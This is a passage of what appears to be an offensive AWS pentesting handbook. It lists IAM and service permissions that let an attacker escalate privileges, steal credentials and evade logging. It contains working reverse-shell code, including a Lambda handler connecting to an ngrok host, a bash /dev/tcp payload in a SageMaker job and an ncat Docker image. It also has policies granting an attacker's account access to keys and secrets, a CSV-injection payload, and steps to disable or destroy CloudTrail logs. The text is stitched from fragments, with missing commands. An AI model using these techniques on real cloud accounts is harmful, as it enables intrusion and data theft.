Where “v2�? is the policy version with the most privileges available.
iam:CreateAccessKey
An attacker with the iam:CreateAccessKey permission on other users can
create an access key ID and secret access key belonging to another user
in the AWS environment, if they don’t already have two sets associated
with them (which best practice says they shouldn’t).
iam:CreateLoginProfile
An attacker with the iam:CreateLoginProfile permission on other users
can create a password to use to login to the AWS console on any user
that does not already have a login profile setup.
iam:UpdateLoginProfile
An attacker with the iam:UpdateLoginProfile permission on other users
can change the password used to login to the AWS console on any user
that already has a login profile setup.
iam:AttachUserPolicy
An attacker with the iam:AttachUserPolicy permission can escalate
privileges by attaching a policy to a user that they have access to, adding
the permissions of that policy to the attacker.
iam:AttachGroupPolicy
An attacker with the iam:AttachGroupPolicy permission can escalate
privileges by attaching a policy to a group that they are a part of, adding
the permissions of that policy to the attacker.
iam:AttachRolePolicy ,
sts:AssumeRole
An attacker with the iam:AttachRolePolicy permission can escalate
privileges by attaching a policy to a role that they have access to, adding
the permissions of that policy to the attacker.
Where the role is a role that the current user can temporarily assume with
sts:AssumeRole .
iam:PutUserPolicy
An attacker with the iam:PutUserPolicy permission can escalate
privileges by creating or updating an inline policy for a user that they
have access to, adding the permissions of that policy to the attacker.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}
iam:PutGroupPolicy
An attacker with the iam:PutGroupPolicy permission can escalate
privileges by creating or updating an inline policy for a group that they
are a part of, adding the permissions of that policy to the attacker.
iam:PutRolePolicy , sts:AssumeRole
An attacker with the iam:PutRolePolicy permission can escalate
privileges by creating or updating an inline policy for a role that they
have access to, adding the permissions of that policy to the attacker.
Where the role is a role that the current user can temporarily assume with
sts:AssumeRole .
iam:AddUserToGroup
An attacker with the iam:AddUserToGroup permission can use it to add
themselves to an existing IAM Group in the AWS account.
iam:UpdateAssumeRolePolicy ,
sts:AssumeRole
An attacker with the iam:UpdateAssumeRolePolicy and sts:AssumeRole
Where the policy looks like the following, which gives the user permission
to assume the role:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}
iam:UploadSSHPublicKey
An attacker with iam:DeactivateMFADevice can upload an SSH public
key and associate it with the specified IAM user(Learn more).
The SSH public key uploaded by this operation can be used only for
authenticating the associated IAM user to an CodeCommit repository.
For more information about using SSH keys to authenticate to an
CodeCommit repository, see Set up CodeCommit for SSH connections in
the CodeCommit User Guide.
Potential Impact: Indirect privesc a user if you already know his username
and password by disabling the MFA device.
iam:ResyncMFADevice
An attacker with iam:ResyncMFADevice can synchronize the specified
MFA device with an IAM entity: user or role (Learn more).
Potential Impact: Indirect privesc a user if you already know his username
and password by adding a MFA device.
iam:UpdateSAMLProvider ,
iam:ListSAMLProviders ,
( iam:GetSAMLProvider )
With these permissions you can change the XML metadata of the SAML
connection. Then, you could abuse the SAML federation to login with any
role that is trusting it.
Note that doing this legit users won't be able to login. However, you could
get the XML, so you can put yours, login and configure the previous back
# List SAMLs
aws iam list-saml-providers
TODO: A Tool capable of generating the SAML metadata and login with a
specified role
iam:UpdateOpenIDConnectProviderThu
mbprint ,
iam:ListOpenIDConnectProviders ,
( iam: GetOpenIDConnectProvider )
(Unsure about this) If an attacker has these permissions he could add a new
Thumbprint to manage to login in all the roles trusting the provider.
{ % code overflow="wrap" %}
# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-
provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character
string)
aws iam update-open-id-connect-provider-thumbprint --open-id-
connect-provider-arn <ARN> --thumbprint-list
359755EXAMPLEabc3060bce3EXAMPLEec4542a3
aws-kms-enum.md
kms:ListKeys , kms:PutKeyPolicy ,
( kms:ListKeyPolicies ,
kms:GetKeyPolicy )
With these permissions it's possible to modify the access permissions to
the key so it can be used by other accounts or even anyone:
{ % code overflow="wrap" %}
policy.json:
{
"Version" : "2012-10-17",
"Id" : "key-consolepolicy-3",
"Statement" : [
{
"Sid" : "Enable IAM User Permissions",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<origin_account>:root"
},
"Action" : "kms:*",
"Resource" : "*"
},
{
"Sid" : "Allow all use",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : [ "kms:*" ],
"Resource" : "*"
}
]
}
kms:CreateGrant
It allows a principal to use a KMS key:
aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal
arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt
Note that it might take a couple of minutes for KMS to allow the user to
use the key after the grant has been generated. Once that time has
passed, the principal can use the KMS key without needing to specify
anything.\ However, if it's needed to use the grant right away, check the
following code.\ For more info read this.
aws-lambda-enum.md
iam:PassRole ,
lambda:CreateFunction ,
lambda:InvokeFunction
A user with the iam:PassRole , lambda:CreateFunction , and
lambda:InvokeFunction permissions can escalate privileges by passing
an existing IAM role to a new Lambda function that includes code to
import the relevant AWS library to their programming language of choice,
then using it perform actions of their choice. The code could then be run by
invoking the function through the AWS API.
A attacker could abuse this to get a rev shell and steal the token:
rev.py
import socket,subprocess,os,time
def lambda_handler(event, context):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(('4.tcp.ngrok.io',14305))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])
time.sleep(900)
return 0
# List roles
aws iam list-attached-user-policies --user-name <user-name>
You could also abuse the lambda role permissions from the lambda
function itself.\ If the lambda role had enough permissions you could use it
to grant admin rights to you:
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return response
iam:PassRole ,
lambda:CreateFunction ,
lambda:AddPermission
Like in the previous scenario, you can grant yourself the
lambda:InvokeFunction permission if you have the permission
lambda:AddPermission
iam:PassRole ,
lambda:CreateFunction ,
lambda:CreateEventSourceMapping
A user with the iam:PassRole , lambda:CreateFunction , and
lambda:CreateEventSourceMapping (and possibly dynamodb:PutItem and
dynamodb:CreateTable ) permissions, but without the
lambda:InvokeFunction permission, can escalate privileges by passing an
existing IAM role to a new Lambda function that includes code to import
the relevant AWS library to their programming language of choice, then
using it perform actions of their choice. They then would need to either
create a DynamoDB table or use an existing one, to create an event
source mapping for the Lambda function pointing to that DynamoDB
table. Then they would need to either put an item into the table or wait for
another method to do so that the Lambda function will be invoked.
Where the code in the python file would utilize the targeted role. An
example would be the same script used in previous method.
After this, the next step depends on whether DynamoDB is being used in
the current AWS environment. If it is being used, all that needs to be done
is creating the event source mapping for the Lambda function, but if not,
then the attacker will need to create a table with streaming enabled with
the following command:
After this command, the attacker would connect the Lambda function and
the DynamoDB table by creating an event source mapping with the
following command:
Now that the Lambda function and the stream are connected, the attacker
can invoke the Lambda function by triggering the DynamoDB stream.
This can be done by putting an item into the DynamoDB table, which will
trigger the stream, using the following command:
aws dynamodb put-item --table-name my_table \
--item Test={S="Random string"}
At this point, the Lambda function will be invoked, and the attacker will be
made an administrator of the AWS account.
lambda:AddPermission
An attacker with this permission can grant himself (or others) any
permissions (this generates resource based policies to grant access to the
resource):
{ % code overflow="wrap" %}
Where the associated .zip file contains code that utilizes the Lambda’s
role. An example could include the code snippet from previous methods.
lambda:UpdateFunctionConfiguration
Introduction
Lambda Layers allows to include code in your lamdba function but
storing it separately, so the function code can stay small and several
functions can share code.
Inside lambda you can check the paths from where python code is loaded
with a function like the following:
import json
import sys
1. /var/task
2. /opt/python/lib/python3.7/site-packages
3. /opt/python
4. /var/runtime
5. /var/lang/lib/python37.zip
6. /var/lang/lib/python3.7
7. /var/lang/lib/python3.7/lib-dynload
8. /var/lang/lib/python3.7/site-packages
9. /opt/python/lib/python3.7/site-packages
10. /opt/python
Exploitation
Attaching a layer to a function only requires the
lambda:UpdateFunctionConfiguration permission and layers can be
shared cross-account. We also would need to know what libraries they
are using, so we can override them correctly, but in this example, we’ll just
assume the attacked function is importing boto3.
Just to be safe, we’re going to use Pip to install the same version of the
boto3 library from the Lambda runtime that we are targeting (Python 3.7),
just so there is nothing different that might cause problems in the target
function. That runtime currently uses boto3 version 1.9.42.
With the following code, we’ll install boto3 version 1.9.42 and its
dependencies to a local "lambda_layer" folder:
Now, bundle that code into a ZIP file and upload it to a new Lambda
layer in the ATTACKER account. You will need to create a “python�?
folder first and put your libraries in there so that once we upload it to
Lambda, the code will be found at “/opt/python/boto3�?. Also, make sure
that the layer is compatible with Python 3.7 and that the layer is in the
same region as our target function. Once that’s done, we’ll use
lambda:AddLayerVersionPermission to make the layer publicly
accessible so that our target account can use it. Use your personal AWS
credentials for this API call.
The next step would be to either invoke the function ourselves if we can or
to wait until it gets invoked by normal means–which is the safer method.
?iam:PassRole ,
lambda:CreateFunction ,
lambda:CreateFunctionUrlConfig ,
lambda:InvokeFunctionUrl
Maybe with those permissions you are able to create a function and execute
it calling the URL... but I could find a way to test it, so let me know if you
do!
Lambda MitM
Some lambdas are going to be receiving sensitive info from the users in
parameters. If get RCE in one of them, you can exfiltrate the info other
users are sending to it, check it in:
aws-warm-lambda-persistence.md
Isolation
Lambda isolation uses thi cgroups:
Replacing Runtime
Now with the new boostrap.py created, it's possible to download it, end
the current lambda invocation and run it to replace the legit one:
import os
from urllib import request
Or you could also use twist_runtime.py, which will end the invocation as
done previously, run the new bootstrap and exfiltrate the information.
If a lambda function is not used for 5-15 minutes it will be shut down, and
all the changes will be lost the next time it's invoked.
Ruby Runtime
In ruby, the file you want to backdoor is /var/runtime/lib/runtime.rb
Then, you just need to do what you did in the python version with just a
change:
require 'net/http'
# Create symlink
ln -s /var/runtime/lib/* /tmp
aws-lightsail-enum.md
It’s important to note that Lightsail doesn’t use IAM roles belonging to
the user but to an AWS managed account, so you can’t abuse this service to
privesc. However, sensitive data such as code, API keys and database info
could be found in this service.
lightsail:DownloadDefaultKeyPair
This permission will allow you to get the SSH keys to access the instances:
lightsail:GetInstanceAccessDetails
This permission will allow you to generate SSH keys to access the
instances:
lightsail:CreateBucketAccessKey
This permission will allow you to get a key to access the bucket:
lightsail:GetRelationalDatabaseMas
terUserPassword
This permission will allow you to get the credentials to access the database:
aws-mq-enum.md
mq:ListBrokers , mq:CreateUser
With those permissions you can create a new user in an ActimeMQ
broker (this doesn't work in RabbitMQ):
{ % code overflow="wrap" %}
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --
password <value> --username <value>
mq:ListBrokers , mq:ListUsers ,
mq:UpdateUser
With those permissions you can create a new user in an ActimeMQ
broker (this doesn't work in RabbitMQ):
{ % code overflow="wrap" %}
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --
password <value> --username <value>
mq:ListBrokers , mq:UpdateBroker
If a broker is using LDAP for authorization with ActiveMQ. It's possible to
change the configuration of the LDAP server used to one controlled by
the attacker. This way the attacker will be able to steal all the credentials
being sent through LDAP.
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-
metadata=...
If you could somehow find the original credentials used by ActiveMQ you
could perform a MitM, steal the creds, used them in the original server, and
send the response (maybe just reusing the crendetials stolen you could do
this).
aws-msk-enum.md
msk:ListClusters ,
msk:UpdateSecurity
With these privileges and access to the VPC where the kafka brokers
are, you could add the None authentication to access them.
{ % code overflow="wrap" %}
You need access to the VPC because you cannot enable None
authentication with Kafka publicly exposed. If it's publicly exposed, if
SASL/SCRAM authentication is used, you could read the secret to access
(you will need additional privileges to read the secret).\ If IAM role-based
authentication is used and kafka is publicly exposed you could still abuse
these privileges to give you permissions to access it.
aws-relational-database-rds-enum.md
rds:ModifyDBInstance
With that permission an attacker can modify the password of the master
user, and the login inside the database:
# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>
You will need to be able to contact to the database (they are usually only
accessible from inside networks).
aws-redshift-enum.md
redshift:DescribeClusters ,
redshift:GetClusterCredentials
With these permissions you can get info of all the clusters (including name
and cluster username) and get credentials to access it:
# Get creds
aws redshift get-cluster-credentials --db-user postgres --
cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the
password
psql -h redshift-cluster-1.asdjuezc439a.us-east-
1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p
5439
redshift:DescribeClusters ,
redshift:GetClusterCredentialsWith
IAM
With these permissions you can get info of all the clusters and get
credentials to access it.\ Note that the postgres user will have the
permissions that the IAM identity used to get the credentials has.
# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-
identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the
password
psql -h redshift-cluster-1.asdjuezc439a.us-east-
1.redshift.amazonaws.com -U
"IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d
template1 -p 5439
redshift:DescribeClusters ,
redshift:ModifyCluster?
It's possible to modify the master password of the internal postgres
(redshit) user from aws cli (I think those are the permissions you need but I
haven't tested them yet):
Moreover, as explained here, Redshift also allows to concat roles (as long
as the first one can assume the second one) to get further access but just
separating them with a comma: iam_role
'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:rol
e/RoleB';
Lambdas
As explained in
https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_F
UNCTION.html, it's possible to call a lambda function from redshift with
something like:
S3
As explained in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-
loading-run-copy.html, it's possible to read and write into S3 buckets:
# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-
id>:role/<role-name>'
region '<region>'
options;
# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;
Dynamo
As explained in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-
data-from-dynamodb.html, it's possible to get data from dynamodb:
copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
The Amazon DynamoDB table that provides the data must be created in the
same AWS Region as your cluster unless you use the REGION option to
specify the AWS Region in which the Amazon DynamoDB table is located.
EMR
Check https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-
emr.html
And the hijack is possible because there is a small time window from the
moment the template is uploaded to the bucket to the moment the
template is deployed. An attacker might just create a lambda function in
his account that will trigger when a bucket notification is sent, and
hijacks the content of that bucket.
The Pacu module cfn__resouce_injection can be used to automate this
attack. For mor informatino check the original research:
https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/
s3:PutObject , s3:GetObject
These are the permissions to get and upload objects to S3. Several
services inside AWS (and outside of it) use S3 storage to store config files.\
An attacker with read access to them might find sensitive information on
them.\ An attacker with write access to them could modify the data to
abuse some service and try to escalate privileges.\ These are some
examples:
s3:PutBucketPolicy
An attacker, that needs to be from the same account, if not the error The
If successful, you will receive the ARN of the new notebook instance in
the response from AWS. That will take a few minutes to spin up, but once
it has done so, we can run the following command to get a pre-signed URL
to get access to the notebook instance through our web browser. There
are potentially other ways to gain access, but this is a single permission and
single API call, so it seemed simple.
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>
If this instance was fully spun up, this API call will return a signed URL
that we can visit in our browser to access the instance. Once at the Jupyter
page in my browser, I’ll click "Open JupyterLab" in the top right, which can
be seen in the following screenshot.
From the next page, scroll all the way down in the “Launcher�? tab. Under
the “Other�? section, click the “Terminal�? button, which can be seen
here.
From the terminal we have a few options, one of which would be to just use
the AWS CLI. The other option would be to contact the EC2 metadata
service for the IAM role’s credentials directly and exfiltrate them.
sagemaker:CreatePresignedNotebookI
nstanceUrl
Similar to the previous example, if Jupyter notebooks are already running
on it and you can list them with sagemaker:ListNotebookInstances (or
discover them in any other way). You can generate a URL for them,
access them, and steal the credentials as indicated in the previous
technique.
sagemaker:CreateProcessingJob,iam:
PassRole
An attacker with those permissions can make sagemaker execute a
processingjob with a sagemaker role attached to it. The attacked can
indicate the definition of the container that will be run in an AWS managed
ECS account instance, and steal the credentials of the IAM role
attached.
# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount":
1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-
1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-
c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >&
/dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>
sagemaker:CreateTrainingJob ,
iam:PassRole
An attacker with those permissions will be able to create a training job,
running an arbitrary container on it with a role attached to it. Therefore,
the attcke will be able to steal the credentials of the role.
This scenario is more difficult to exploit than the previous one because you
need to generate a Docker image that will send the rev shell or creds
directly to the attacker (you cannot indicate a starting command in the
configuration of the training job).
# Create docker image
mkdir /tmp/rev
## Note that the trainning job is going to call an executable
called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -
e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF
cd /tmp/rev
sudo docker build . -t reverseshell
# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --
region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.
<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.
<region>.amazonaws.com/reverseshell:latest
# Create trainning job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType":
"ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"
<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell",
"TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'
sagemaker:CreateHyperParameterTuni
ngJob , iam:PassRole
An attacker with those permissions will (potentially) be able to create an
hyperparameter training job, running an arbitrary container on it with
a role attached to it.\ I haven't exploited because of the lack of time, but
looks similar to the previous exploits, feel free to send a PR with the
exploitation details.
aws-secrets-manager-enum.md
secretsmanager:GetSecretValue
An attacker with this permission can get the saved value inside a secret in
AWS Secretsmanager.
Potential Impact: Access high sensitive data inside AWS secrets manager
service.
secretsmanager:GetResourcePolicy ,
secretsmanager:PutResourcePolicy ,
( secretsmanager:ListSecrets )
With the previous permissions it's possible to give access to other
principals/accounts (even external) to access the secret. Note that in order
to read secrets encrypted with a KMS key, the user also needs to have
access over the KMS key (more info in the KMS Enum page).
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id
<secret_name>
aws secretsmanager put-resource-policy --secret-id
<secret_name> --resource-policy file:///tmp/policy.json
policy.json:
{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}
aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum
ssm:SendCommand
An attacker with the permission ssm:SendCommand can execute
commands in instances running the Amazon SSM Agent and compromise
the IAM Role running inside of it.
ssm:StartSession
An attacker with the permission ssm:StartSession can start a SSH like
session in instances running the Amazon SSM Agent and compromise the
IAM Role running inside of it.
Potential Impact: Direct privesc to the EC2 IAM roles attached to running
instances with SSM Agents running.
Privesc to ECS
When ECS tasks run with ExecuteCommand enabled users with enough
permissions can use ecs execute-command to execute a command inside
the container.\ According to the documentation this is done by creating a
secure channel between the device you use to initiate the “exec“ command
and the target container with SSM Session Manager. Therefore, users with
ssm:StartSession will be able to get a shell inside ECS tasks with that
option enabled just running:
aws ssm start-session --target
"ecs:CLUSTERNAME_TASKID_RUNTIMEID"
Potential Impact: Direct privesc to the ECS IAM roles attached to running
tasks with ExecuteCommand enabled.
ssm:ResumeSession
An attacker with the permission ssm:ResumeSession can re-start a SSH
like session in instances running the Amazon SSM Agent with a
disconnected SSM session state and compromise the IAM Role running
inside of it.
Potential Impact: Direct privesc to the EC2 IAM roles attached to running
instances with SSM Agents running and disconected sessions.
ssm:DescribeParameters ,
( ssm:GetParameter |
ssm:GetParameters )
An attacker with the mentioned permissions is going to be able to list the
SSM parameters and read them in clear-text. In these parameters you can
frequently find sensitive information such as SSH keys or API keys.
ssm:ListCommands
An attacker with this permission can list all the commands sent and
hopefully find sensitive information on them.
ssm:GetCommandInvocation ,
( ssm:ListCommandInvocations |
ssm:ListCommands )
An attacker with these permissions can list all the commands sent and read
the output generated hopefully finding sensitive information on it.
# You can use any of both options to get the command-id and
instance id
aws ssm list-commands
aws ssm list-command-invocations
For example, the following role trust policy indicates that anyone can
assume it, therefore any user will be able to privesc to the permissions
associated with that role.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "sts:AssumeRole"
}
]
}
sts:AssumeRoleWithSAML
A trust policy with this role grants users authenticated via SAML access
to impersonate the role.
But providers might have their own tools to make this easier, like
onelogin-aws-assume-role:
onelogin-aws-assume-role --onelogin-subdomain mettle --
onelogin-app-id 283740 --aws-region eu-west-1 -z 3600
sts:AssumeRoleWithWebIdentity
This permission grants permission to obtain a set of temporary security
credentials for users who have been authenticated in a mobile, web
application, EKS... with a web identity provider. Learn more here.
{ % code overflow="wrap" %}
Federation Abuse
aws-federation-abuse.md
Support HackTricks and get benefits!
AWS - WorkDocs Privesc
WorkDocs
For more info about WorkDocs check:
aws-directory-services-workdocs.md
workdocs:CreateUser
Create a user inside the Directory indicated, then you will have access to
both WorkDocs and AD:
workdocs:GetDocument ,
(workdocs: DescribeActivities )
The files might contain sensitive information, read them:
# Get what was created in the directory
aws workdocs describe-activities --organization-id <directory-
id>
workdocs:AddResourcePermissions
If you don't have access to read something, you can just grant it
workdocs:AddUserToGroup
You can make a user admin by setting it in the group ZOCALO_ADMIN.\
For that follow the instructions from
https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_adm
in.html
Login with that user in workdoc and access the admin panel in
/workdocs/index.html#/admin
I didn't find any way to do this from the cli.
AWS - Misc Privesc
Support HackTricks and get benefits!
Misc
Here you will find combinations of permissions you could abuse to
escalate privileges or access sensitive data.
route53:CreateHostedZone ,
route53:ChangeResourceRecordSets ,
acm-pca:IssueCertificate , acm-
pca:GetCertificate
To perform this attack the target account must already have an AWS
Certificate Manager Private Certificate Authority (AWS-PCA) setup in
the account, and EC2 instances in the VPC(s) must have already imported
the certificates to trust it. With this infrastructure in place, the following
attack can be performed to intercept AWS API traffic.
pca:ListCertificateAuthorities , ec2:DescribeVpcs
route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-
issuecertificate-acm-pca-getcer.md
ec2:DescribeInstances ,
ec2:RunInstances ,
ec2:CreateSecurityGroup ,
ec2:AuthorizeSecurityGroupIngress ,
ec2:CreateTrafficMirrorTarget ,
ec2:CreateTrafficMirrorSession ,
ec2:CreateTrafficMirrorFilter ,
ec2:CreateTrafficMirrorFilterRule
With all these permissions you will be able to run a "malmirror" that will
be able to steal the network packets send inside the VPC.
aws-malicious-vpc-mirror.md
Let’s start with the prerequisites that the attacker has taken over the IAM
role which allows to make modifications to Route53 and issue the
certificates signed by private CA from ACM-PCA.
The minimum IAM permissions that the role must have to do the same
exploitation are:
route53:CreateHostedZone
route53:ChangeResourceRecordSets
acm-pca:IssueCertificate
acm-pca:GetCertificate
The other IAM permissions which can be useful in enumeration but are not
mandatory to exploit:
route53:GetHostedZone
route53:ListHostedZones
acm-pca:ListCertificateAuthorities
ec2:DescribeVpcs
Once the attacker has minimum IAM permissions on route53 and acm-pca,
he or she would be able to hijack the calls to AWS API and successfully
escalate the IAM privileges in AWS deployment - by forwarding the hijack
AWS API calls to relevant VPC Endpoints and reading the responses e.g.
secretsmanager:GetSecretValue call.
All of those assumptions are not true. The AWS Security has been
consulted but it turned out it is not a security bug. There are use cases
where the clients want to set up the proxy or custom routing for the traffic
to AWS APIs. I have decided to document and share this behavior as it
might be useful for other cloud pen-testers.
Discovery
The discovery started with playing the route53, by first creating the hosted
zone for amazonaws.com, which failed:
I have tried the same for us-east-1.amazonaws.com, which gave the same
results:
Simulating the victim listing secrets in the victim machine and in the
attacker’s machine we receive the connection which is TLS encrypted
traffic:
The communication is TLS encrypted but if the applications in the VPC
trust the private CA managed by the ACM-PCA and the attacker has IAM
permissions to control that private CA in ACM-PCA, it would be possible
to do full Man-In-The-Middle and escalate IAM privileges.
Exploitation
You can watch the whole exploitation here:
https://youtu.be/I-IakgPyEtk
If you prefer to read and go through the screenshot, please carry on.
In the real world, the ec2 should not have such broad permissions but you
may encounter some developer or DevOps role having so.
The compromised ec2 with the privileged IAM role has the internal IP
10.0.0.87, the victim application runs on the ec2 with IP 10.0.0.224.
Now on the attacker’s owned machine, we create the hosted zone for
secretsmanager.us-east-1.amazonaws.com:
Then set the A record for secretsmanager.us-east-1.amazonaws.com
pointing to the 10.0.0.87:
Then, the attacker retrieves the signed certificate from the ACM-PCA:
To simulate the Java Application calls to Secrets Manager from the victim’s
machine, I have run the JUnit tests through maven, in the below screenshot
you can see that there are no exceptions, which means that the certificate is
trusted:
Finally, in the ncat listener, we can see the HTTP request sent by the AWS
SDK from Java Application.
How to escalate the IAM privileges using that? We do not have the
permissions to do s3:GetObject on any s3 object or to do
secretsmanager:GetSecretValue, but if we sniff the traffic to either S3 or
secretsmanager with those calls, we can forward the requests to the
respective VPCE and obtain access to Objects stored in S3 or secrets stored
in secretsmanager.
Conclusions
It is recommended to avoid broad route53 IAM permissions with regards to
the creation of a private hosted zone or unrestricted
route53:ChangeResourceRecordSets. Since ACM-PCA does not allow to
apply restrictions on which domain’s certificate can be signed by the private
CA, it is also recommended to pay special attention to the acm-
pca:IssueCertificate IAM permissions.
Abstract Services
These services are removed, abstracted, from the platform or
management layer which cloud applications are built on.
The services are accessed via endpoints using AWS application
programming interfaces, APIs.
The underlying infrastructure, operating system, and platform is
managed by AWS.
The abstracted services provide a multi-tenancy platform on which the
underlying infrastructure is shared.
Data is isolated via security mechanisms.
Abstract services have a strong integration with IAM, and examples of
abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
Services Enumeration
AWS offers hundreds of different services, here you can find how to
enumerate some of them, and also post-exploitation, persistence and
detection evasion tricks:
CloudTrail
CloudWatch
Cost Explorer
Config
Detective
Firewall Manager
GuardDuty
Inspector
Macie
Security Hub
Shield
Trusted Advisor
WAF
S3 folder structure
Note that the folders "AWSLogs" and "CloudTrail" are fixed folder names,
This way you can easily configure CloudTrail in all the regions of all the
accounts and centralize the logs in 1 account (that you should protect).
Logs to CloudWatch
CloudTrail can automatically send logs to CloudWatch so you can set
alerts that warns you when suspicious activities are performed.\ Note
that in order to allow CloudTrail to send the logs to CloudWatch a role
needs to be created that allows that action. If possible, it's recommended to
use AWS default role to perform these actions. This role will allow
CloudTrail to:
Event History
CloudTrail Event History allows you to inspect in a table the logs that have
been recorded:
Insights
CloudTrail Insights automatically analyzes write management events
from CloudTrail trails and alerts you to unusual activity. For example, if
there is an increase in TerminateInstance events that differs from
established baselines, you’ll see it as an Insight event. These events make
finding and responding to unusual API activity easier than ever.
Security
Validate if logs have been tampered
with (modified or deleted)
Uses digest files (create hash for each
file)
SHA-256 hashing
CloudTrail Log File SHA-256 with RSA for digital
Integrity signing
private key owned by Amazon
</li>
Takes 1 hour to create a digest file
(done on the hour every hour)
</ul>
# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>
CSV Injection
It's possible to perform a CVS injection inside CloudTrail that will execute
arbitrary code if the logs are exported in CSV and open with Excel.\ The
following code will generate log entry with a bad Trail name containing the
payload:
import boto3
payload = "=cmd|'/C calc'|''"
client = boto3.client('cloudtrail')
response = client.create_trail(
Name=payload,
S3BucketName="random"
)
print(response)
https://book.hacktricks.xyz/pentesting-web/formula-injection
This way, an attacker can obtain the ARN of the key without triggering
any log. In the ARN the attacker can see the AWS account ID and the
name, it's easy to know the Honeytoken's companies accounts ID and
names, so this way an attacker can identify id the token is a honeytoken.
**[This script]
(https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail
-unsupported-aws-services.html) or [Pacu]
(https://github.com/RhinoSecurityLabs/pacu) detects if a key belongs to
Canarytokens or SpaceCrab**.
The API used in Pacu and the script is now caught, so you need to find a
new one.\ To find a new one you could generate a canary token in
https://canarytokens.org/generate
Delete trails
Stop trails
Bucket Modification
Delete the S3 bucket
Change bucket policy to deny any writes from the CloudTrail service
Add lifecycle policy to S3 bucket to delete objects
Disable the kms key used to encrypt the CloudTrail logs
Cloudtrail "ransomware"
You could generate an asymmetric key and make CloudTrail encrypt the
data with that key and delete the private key so the cloudtrail contents
cannot be recovered cannot be recovered.
References
https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory
You can monitor for example logs from CloudTrail. Events that are
monitored:
CloudWatch Logs
Allows to aggregate and monitor logs from applications and systems
from AWS services (including CloudTrail) and from apps/systems
(CloudWatch Agent can be installed on a host). Logs can be stored
indefinitely (depending on the Log Group settings) and can be exported.
Elements:
Agent Installation
You can install agents inside your machines/containers to automatically
send the logs back to CloudWatch.
